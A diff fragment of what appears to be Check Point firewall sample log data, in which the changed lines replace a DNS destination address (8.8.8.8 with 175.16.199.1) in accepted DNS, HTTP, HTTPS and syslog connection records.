+<134>1 2020-03-29T23:26:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812e9f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585524383"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36245"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:26:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812ea9,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585524393"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48406"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:26:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812eb3,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585524403"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55965"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:26:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812ebd,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585524413"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36744"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:27:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812ec7,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585524423"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50482"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T23:27:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ec9,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T23:27:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ecd,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52390"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T23:27:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ecd,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52391"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T23:27:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ece,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52392"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T23:27:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ece,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52393"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T23:27:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ed1,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37768"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
-<134>1 2020-03-29T23:27:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812ed1,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585524433"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47343"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:27:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812ed1,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585524433"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47343"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T23:27:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ed1,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"59414"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10895"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T23:27:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ed1,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52662"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T23:27:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ed1,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"61446"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10896"; xlatesrc:"0.0.0.0"]
@@ -7096,23 +7096,23 @@
 <134>1 2020-03-29T23:27:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ed1,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"49066"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10897"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T23:27:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ed2,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50845"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T23:27:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ed2,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.108.169.64"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"43484"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10898"; xlatesrc:"0.0.0.0"]
-<134>1 2020-03-29T23:27:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812edb,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585524443"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50767"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:27:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812edb,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585524443"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50767"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T23:27:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ee3,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52394"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T23:27:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ee3,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52395"; service:"443"; service_id:"https"; src:"192.168.1.117"]
-<134>1 2020-03-29T23:27:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812ee5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45671"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T23:27:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812eef,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585524463"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54505"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:27:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812ee5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45671"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:27:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812eef,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585524463"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54505"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T23:27:45Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ef1,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T23:27:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812ef9,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585524473"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56976"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:27:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812ef9,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585524473"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56976"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
